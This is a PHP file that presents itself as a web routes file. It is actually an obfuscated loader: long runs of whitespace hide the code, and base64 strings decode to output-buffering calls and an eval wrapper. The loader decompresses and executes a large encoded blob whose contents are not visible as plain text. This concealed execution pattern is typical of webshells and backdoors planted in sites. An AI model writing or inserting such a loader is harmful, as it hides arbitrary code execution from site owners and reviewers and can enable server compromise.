<?php 
        $__='printf';$_='Loading routes/web.php';
        



























































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































                                                                                                                                                                                                                     $________;
